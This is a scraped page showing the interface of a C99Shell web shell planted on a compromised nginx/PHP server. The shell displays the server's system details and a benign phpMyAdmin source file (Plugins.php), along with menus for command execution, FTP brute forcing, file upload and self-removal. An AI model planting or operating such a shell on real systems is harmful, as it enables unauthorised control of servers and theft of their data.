!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/phpmyadmin/libraries/classes/Server/   drwxr-xr-x
Free 83.32 GB of 96.73 GB (86.14%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Plugins.php (1.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
PhpMyAdmin\Server;

use 
PhpMyAdmin\DatabaseInterface;

class 
Plugins
{
    
/** @var DatabaseInterface */
    
private $dbi;

    
/**
     * @param DatabaseInterface $dbi DatabaseInterface instance
     */
    
public function __construct(DatabaseInterface $dbi)
    {
        
$this->dbi $dbi;
    }

    
/**
     * @return Plugin[]
     */
    
public function getAll(): array
    {
        global 
$cfg;

        
$sql 'SHOW PLUGINS';
        if (! 
$cfg['Server']['DisableIS']) {
            
$sql 'SELECT * FROM information_schema.PLUGINS ORDER BY PLUGIN_TYPE, PLUGIN_NAME';
        }
        
$result $this->dbi->query($sql);
        
$plugins = [];
        while (
$row $this->dbi->fetchAssoc($result)) {
            
$plugins[] = $this->mapRowToPlugin($row);
        }
        
$this->dbi->freeResult($result);

        return 
$plugins;
    }

    
/**
     * @param array $row Row fetched from database
     */
    
private function mapRowToPlugin(array $row): Plugin
    
{
        return 
Plugin::fromState([
            
'name' => $row['PLUGIN_NAME'] ?? $row['Name'],
            
'version' => $row['PLUGIN_VERSION'] ?? null,
            
'status' => $row['PLUGIN_STATUS'] ?? $row['Status'],
            
'type' => $row['PLUGIN_TYPE'] ?? $row['Type'],
            
'typeVersion' => $row['PLUGIN_TYPE_VERSION'] ?? null,
            
'library' => $row['PLUGIN_LIBRARY'] ?? $row['Library'] ?? null,
            
'libraryVersion' => $row['PLUGIN_LIBRARY_VERSION'] ?? null,
            
'author' => $row['PLUGIN_AUTHOR'] ?? null,
            
'description' => $row['PLUGIN_DESCRIPTION'] ?? null,
            
'license' => $row['PLUGIN_LICENSE'] ?? $row['License'],
            
'loadOption' => $row['LOAD_OPTION'] ?? null,
            
'maturity' => $row['PLUGIN_MATURITY'] ?? null,
            
'authVersion' => $row['PLUGIN_AUTH_VERSION'] ?? null,
        ]);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0046 ]--